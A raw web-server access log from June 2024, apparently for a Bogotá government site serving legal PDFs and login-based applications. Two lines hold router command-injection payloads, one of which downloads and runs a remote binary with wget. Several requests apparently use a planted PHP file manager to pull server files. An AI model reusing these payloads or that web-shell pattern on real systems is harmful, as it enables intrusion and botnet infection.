201.245.192.253 - - [27/Jun/2024:10:31:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Jun/2024:10:31:17 -0500] "GET /BLA/resoluciones/AUTOS%202016/2024.pdf HTTP/1.1" 200 812412
216.244.66.195 - - [27/Jun/2024:10:31:22 -0500] "GET /BLA/resoluciones/AUTOS%202016/2113.pdf HTTP/1.1" 200 331965
186.86.210.10 - - [27/Jun/2024:10:31:25 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12724
186.86.210.10 - - [27/Jun/2024:10:31:26 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
186.86.210.10 - - [27/Jun/2024:10:31:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=hPUg6PioVBB-nMWv1jik88wv.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.86.210.10 - - [27/Jun/2024:10:31:26 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
186.86.210.10 - - [27/Jun/2024:10:31:26 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
186.86.210.10 - - [27/Jun/2024:10:31:26 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
186.86.210.10 - - [27/Jun/2024:10:31:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:31:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=hPUg6PioVBB-nMWv1jik88wv.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.86.210.10 - - [27/Jun/2024:10:31:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=hPUg6PioVBB-nMWv1jik88wv.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
186.86.210.10 - - [27/Jun/2024:10:31:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=hPUg6PioVBB-nMWv1jik88wv.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
186.86.210.10 - - [27/Jun/2024:10:31:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=hPUg6PioVBB-nMWv1jik88wv.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
186.86.210.10 - - [27/Jun/2024:10:31:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=hPUg6PioVBB-nMWv1jik88wv.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
186.86.210.10 - - [27/Jun/2024:10:31:28 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.86.210.10 - - [27/Jun/2024:10:31:28 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
186.86.210.10 - - [27/Jun/2024:10:31:28 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
186.86.210.10 - - [27/Jun/2024:10:31:28 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
186.86.210.10 - - [27/Jun/2024:10:31:28 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
186.86.210.10 - - [27/Jun/2024:10:31:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:31:29 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12402
186.86.210.10 - - [27/Jun/2024:10:31:29 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:31:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:31:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:31:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:31:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:31:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:31:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:31:29 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
216.244.66.195 - - [27/Jun/2024:10:31:34 -0500] "GET /BLA/resoluciones/AUTOS%202016/2557.pdf HTTP/1.1" 200 483010
66.249.66.11 - - [27/Jun/2024:10:32:03 -0500] "GET /BLA/resoluciones/AUTOS%202020/2591.pdf HTTP/1.1" 200 358108
201.245.192.253 - - [27/Jun/2024:10:32:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:10:32:16 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
66.249.66.13 - - [27/Jun/2024:10:32:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3411.pdf HTTP/1.1" 200 317124
172.22.2.4 - - [27/Jun/2024:10:32:19 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
186.102.45.138 - - [27/Jun/2024:10:32:33 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX198dPO+nD4Ym71OWBjWBExhHA6i5ceFzvzTMAdmjWkfet4ehFIrXUrw&y=U2FsdGVkX19Bu5x3d7E/pvewb82ClTOLCCTASBkbLic= HTTP/1.1" 200 30
186.102.45.138 - - [27/Jun/2024:10:32:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19AAPre6cSz6oC8JBEiHjCY8i33i3oK9KY2srcnRoZ50eARm8W2naLVuJ3QYFqViifrgvrNf4qwD9DL8tpR1LYz92B1Y4yHuM4=&u=U2FsdGVkX1+okCrJ4B6I4p4H2zA+OWxuqpzVi4Cyg0Q=&y=U2FsdGVkX19Bu5x3d7E/pvewb82ClTOLCCTASBkbLic= HTTP/1.1" 200 97
186.102.45.138 - - [27/Jun/2024:10:32:34 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19bI4N7Gp/rxYRUO+yKj21TN8P6fpelsF2mnEpiIMIxe96K9EMA8Zgs11TWmsTJQzxOvbi5waNHcNiD916JLhN7FdJQ4Z/GSyvBEPRdH6fcqD357bPpx1Sz/X8BMYyMB21q1Zp91BpaQmkG7tGvKNsL3ujykcjm/AuveH47+3MMtALWKExkrqCJBtc2BFosI8agwmxYarPOBpnWCTZrGurfH763zuu1vL/jFpJjR6HxkcgOOqVxxbDhk6gbT7lLFpZSiwWVyg/uz6jP2xOC2rzGrl79GhZ+KybxNHRVhORgeg5XCXuFkNN/hAdW2wWRAEcO5KRWtf6pikNoi7VbhY3HiUoAs61v0u1gjX++YjrWwZMJURUAT7SDrHuXgrfKHN/hwqNLSBbHTAPgJ+7NHIsoqPRMU4oU92cPB3gIGImlsWfX50cJj6vhZG1KEYDfHK7gkptWR0N/TUnauTVDg0hQ2MxuN4teTprDAggoTZyqrmzpwd85c9A8AU05iMgTLyZ4tBUBrQi7+Np1V3HF/fEfZLLwINK3v1BNLfYRtpHGfgmJKFbRT074bBC6IclpMUniWI4y/wBURcZtESn9ZSji2JFVzyfrIYXstRqO3/bnyetXjDnOMvW8g7mMck8FSh+cWg6Gvn6yLMg3naBajzZ1PXfpTj0oMrB06k5mXSbcQSI+gxMO7LEskaEKYPKHMSsctZv67l8iokh1grl4dKbGaQ8Qf5fOkzKbojU/nr4VmhGNUsxU6s5pGHQ54yTghYEkFJQOv0uY2AjiCHCN1n5GL9HQYCJq6jLJQh8PoBP3Fdjx9kGkdjotcFWe8SHgmreuErNgwXoPrD/0q5VR1i9i3IsD9fBE0/qI+HqtgNGci6c64U9FTW3+Gj6C+25FjTa0af+G69y1vu7gdFXCO7zWeJe4IvqHciojxNvOz+gm/mz9xCtqacfsKbe4xRgjmBlELC+U5iRDiDPHXJKAtLQGk4PLKM2XYcO34+tNYtwFpqHjcP4JgHydIGla3wlFUMKYuALeA186I+eJR6nzoGbKV/4V+glp6Q7U9ysi8qEwIPtZZqGFlWygQ7k5HO+3x9dMth949EIFznbsalCRfjrQewBdEzje38YG1p5namKzt+PtYNu1j5Cu2KSSiQc4U7AJVNdrEoC9PXTK0Riqg0BrEktW/MqOgoAWPg2SPmdhxTZXYwaOBxbjvAYGBcd1k1eqjPem66/aYsso9VdRkp4pJ211veLEkbh8462h7fpw9+2/KloZK17ZmYvrwPzXLU0rgtZE02KGw4A1y/PWNcFEseqKCWIw7RNsJfCfzMBV7PhgHQCTjPvnFKY7YLPYxekdO2dgdDQWOYAOlr/gYvxrX+JnxIxerH1Spmz7B6aTDJEzUujYuGFBD9OOmTlCbZn0Vs9VEDUncFZAsCMiA5G+iywlpgLPfIO4pgxdRdM1aczNUM/6ks+XgJ49MZRoKrdU7T7j+tjBCacsn+eKSlCoQNYWVzFR0nopchsjBYgxeadcazp+Zhm16xNW0ms8Kvlnc2vVynW1F2HwPn+t1Y8q3FwEEb+GcRvFcIvUkI3TIsrH4WM2y3heRXV5bp8ff/XaVTXaptA7j9IT44qIKyQ2FkrmoIXNXwzFKCv1uCJLSA6//7Wp4F6WMwF8lDinhem0YcSmpICs+x5GNdKlBCDDVJUlMNpjWEs5RG4aLxlmBrx9tr6XelSIgRHae0H1WEwmb8H+IGd4x0OjFFdM6licyixa8/7iSoA=&u=U2FsdGVkX1+okCrJ4B6I4p4H2zA+OWxuqpzVi4Cyg0Q=&y=U2FsdGVkX19Bu5x3d7E/pvewb82ClTOLCCTASBkbLic= HTTP/1.1" 200 1453
186.102.45.138 - - [27/Jun/2024:10:32:34 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19L3ziRvDy6CiIIDTyiMZ9RiQD4/tQzvCwIuR+lbRuimRBpT46S/vzaP3GNzGaKxtNLhgPAz0OntOObifY0yoVXVd1dEcIyoqCf1oAkc+dyg2cBa8QgeH3PRWSGauHWU/FX2FM4AS1ZzJ1do7vbtS8RAlpG8maiB1++be0jNUGfWYou24Lf+7W6IYqFVKbPB9/R7EQN0H13KOSA/9rCLhkn7PO+33p5ksmDGs4Y+QyNEaZ77AQsuzCw+DuWmV4tLAsFwdDQT4SxuxFcDdT9KYb7A+6JaWaF9FsFUzz4r5Df8Vc+ZlUem6JICgPX+mDfCtN0GpxtmOfpGYyQhS+i9JI1TsOCYdf7uHyLlBlQWVPLjUMGUrG4hd48cF6zsAs5H1Tw/Cw97YPk49h6Bn4PABcqxJkktD+pxV9G1VJNOzBAoEI0ui5iUryhcyFYQRtpVubpa/n/YoJwpwPzvoqcOM6D3xruqeA84yYcjNHoTjt9fgwY+YH031mrs8qEI68qye938OyVn2jcehyVGMW5Qly7JrQcFkkkwfNAzQsT9rBzF83SZUoG++6rE2zXC6dN6aSvJ6yYh8ao/oMqptzcM9D+RF5nt4kuIvYRT1rGAizCmeFhczdZ9pk41IKjHOwbZt5Kxzu+rPY9jScCvffXBZZBZ10uHDrw3IQ4opBF5dotfpQTI6gBHOwPNMpAU/jsU+gfpUKcOAzXvALj7qFDygQjfZXldFLAeO7gZkwE4aesNboE1woTlyRU&u=U2FsdGVkX1+okCrJ4B6I4p4H2zA+OWxuqpzVi4Cyg0Q=&y=U2FsdGVkX19Bu5x3d7E/pvewb82ClTOLCCTASBkbLic= HTTP/1.1" 200 222
172.22.2.4 - - [27/Jun/2024:10:32:35 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=00833&usuario=&sector=&fecha=2024&resuelve= HTTP/1.1" 200 1129
186.102.45.138 - - [27/Jun/2024:10:32:34 -0500] "GET /kwssiamovil/sm/cjson/pre?f=19&x=U2FsdGVkX198dPO+nD4Ym71OWBjWBExhHA6i5ceFzvzTMAdmjWkfet4ehFIrXUrw HTTP/1.1" 200 66671
186.86.210.10 - - [27/Jun/2024:10:32:40 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2215
186.86.210.10 - - [27/Jun/2024:10:32:40 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:32:41 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16459
186.86.210.10 - - [27/Jun/2024:10:32:42 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
186.86.210.10 - - [27/Jun/2024:10:32:42 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
186.86.210.10 - - [27/Jun/2024:10:32:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:32:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:32:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:32:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:32:43 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
186.86.210.10 - - [27/Jun/2024:10:32:43 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.86.210.10 - - [27/Jun/2024:10:32:43 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
186.86.210.10 - - [27/Jun/2024:10:32:43 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
186.86.210.10 - - [27/Jun/2024:10:32:44 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
186.86.210.10 - - [27/Jun/2024:10:32:44 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:32:45 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 65050
186.86.210.10 - - [27/Jun/2024:10:32:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:32:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:32:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:32:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:32:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1552
201.245.192.253 - - [27/Jun/2024:10:33:00 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [27/Jun/2024:10:33:00 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
201.245.192.253 - - [27/Jun/2024:10:33:00 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
201.245.192.253 - - [27/Jun/2024:10:33:00 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
201.245.192.253 - - [27/Jun/2024:10:33:00 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
201.245.192.253 - - [27/Jun/2024:10:33:00 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.86.210.10 - - [27/Jun/2024:10:33:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 10708
186.102.54.49 - - [27/Jun/2024:10:33:01 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1/0IVFJXsHoHAJOlRi5YU7Q17OrEy0YA90B7ML6xnqYMBwWehtBvJtBK8E4JI7KCxVEEG2gLLYR4qwScdUtmWW1m+eZxXUYoKojbWf7wm/tIQqN1eyJff/0HI8IpYVH55WJLMJfI9mnX7f8aqvBKLTVvJibgDnYDx8=&u=U2FsdGVkX18z2h74tIdYC1UGapeLy32HyNS0b5I4QGY=&y=U2FsdGVkX1/XlBSAEBrH8gr/dRE7TBNhVWS+tcGPe80= HTTP/1.1" 200 60
201.245.192.253 - - [27/Jun/2024:10:33:03 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
201.245.192.253 - - [27/Jun/2024:10:33:05 -0500] "POST /appsia/controlador HTTP/1.1" 200 16453
201.245.192.253 - - [27/Jun/2024:10:33:05 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
186.86.210.10 - - [27/Jun/2024:10:33:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32404
201.245.192.253 - - [27/Jun/2024:10:33:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.86.210.10 - - [27/Jun/2024:10:33:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31997
201.245.192.253 - - [27/Jun/2024:10:33:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.86.210.10 - - [27/Jun/2024:10:33:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32133
216.245.221.92 - - [27/Jun/2024:10:33:21 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.13 - - [27/Jun/2024:10:33:24 -0500] "GET /BLA/resoluciones/AUTOS%202023/2306.pdf HTTP/1.1" 200 413184
201.245.192.253 - - [27/Jun/2024:10:33:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [27/Jun/2024:10:31:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
141.98.83.197 - - [27/Jun/2024:10:33:44 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [27/Jun/2024:10:33:44 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
186.86.210.10 - - [27/Jun/2024:10:33:47 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 14153
186.86.210.10 - - [27/Jun/2024:10:33:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5241
66.249.66.12 - - [27/Jun/2024:10:33:53 -0500] "GET /BLA/resoluciones/AUTOS%202023/3820.pdf HTTP/1.1" 200 327337
186.86.210.10 - - [27/Jun/2024:10:33:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5249
186.86.210.10 - - [27/Jun/2024:10:33:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28825
186.86.210.10 - - [27/Jun/2024:10:33:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28829
186.86.210.10 - - [27/Jun/2024:10:34:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 17188
186.86.210.10 - - [27/Jun/2024:10:34:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5060
66.249.66.11 - - [27/Jun/2024:10:34:04 -0500] "GET /BLA/resoluciones/AUTOS%202023/5981.pdf HTTP/1.1" 200 373098
186.86.210.10 - - [27/Jun/2024:10:34:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5357
201.245.192.253 - - [27/Jun/2024:10:34:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.86.210.10 - - [27/Jun/2024:10:34:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 6365
186.86.210.10 - - [27/Jun/2024:10:34:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 39086
186.86.210.10 - - [27/Jun/2024:10:34:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:34:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:34:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:34:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:34:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 32379
186.86.210.10 - - [27/Jun/2024:10:34:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12769
186.86.210.10 - - [27/Jun/2024:10:34:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 129028
186.86.210.10 - - [27/Jun/2024:10:34:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:34:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:34:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.210.10 - - [27/Jun/2024:10:34:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
66.249.66.11 - - [27/Jun/2024:10:34:27 -0500] "GET /BLA/resoluciones/AUTOS%202023/3331.pdf HTTP/1.1" 200 1304062
172.22.2.4 - - [27/Jun/2024:10:32:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
186.86.210.10 - - [27/Jun/2024:10:34:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1907756
186.86.210.10 - - [27/Jun/2024:10:34:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1907756
66.249.66.11 - - [27/Jun/2024:10:34:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8666.pdf HTTP/1.1" 200 582726
186.86.210.10 - - [27/Jun/2024:10:34:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1907756
201.245.192.253 - - [27/Jun/2024:10:35:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:10:35:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.120.249 - - [27/Jun/2024:10:35:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs&f=customize-base.min.js&ft=download HTTP/1.1" 200 7030
207.46.13.102 - - [27/Jun/2024:10:35:27 -0500] "GET /forest/ HTTP/1.1" 200 12041
47.128.112.193 - - [27/Jun/2024:10:35:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes&f=rss-functions.php&ft=download HTTP/1.1" 200 189
66.249.66.11 - - [27/Jun/2024:10:35:49 -0500] "GET /BLA/resoluciones/AUTOS%202023/09558.pdf HTTP/1.1" 200 495364
47.128.19.100 - - [27/Jun/2024:10:35:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cnetwork&f=theme-install.php&ft=download HTTP/1.1" 200 466
201.245.192.253 - - [27/Jun/2024:10:36:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.29.194 - - [27/Jun/2024:10:36:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CParticipaci%F3n&f=126PM01-PR09.pdf&ft=download HTTP/1.1" 200 966303
47.128.113.146 - - [27/Jun/2024:10:36:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CSIIPEV%5CDiseno+de+Elementos+de+Mobiliario+Urbano%5C&f=Parte1.html&ft=download HTTP/1.1" 200 3594
47.128.27.152 - - [27/Jun/2024:10:36:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5Ctinymce&f=wp-tinymce.js.gz&ft=download HTTP/1.1" 200 138529
47.128.112.89 - - [27/Jun/2024:10:36:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+759+DE+2006.PDF&ft=download HTTP/1.1" 200 31933
66.249.66.11 - - [27/Jun/2024:10:36:54 -0500] "GET /BLA/resoluciones/AUTOS%202023/05476.pdf HTTP/1.1" 200 1626582
201.245.192.253 - - [27/Jun/2024:10:37:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.48.12 - - [27/Jun/2024:10:37:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin&f=edit-comments.php&ft=download HTTP/1.1" 200 11611
201.245.192.253 - - [27/Jun/2024:10:37:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [27/Jun/2024:10:37:18 -0500] "GET /BLA/resoluciones/AUTOS%202023/1491.pdf HTTP/1.1" 200 504661
201.245.192.253 - - [27/Jun/2024:10:37:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37107
201.245.192.253 - - [27/Jun/2024:10:37:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34530
47.128.34.138 - - [27/Jun/2024:10:37:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGesti%F3n+Ambiental%5C&f=126PM03-PR02.pdf&ft=download HTTP/1.1" 200 20127
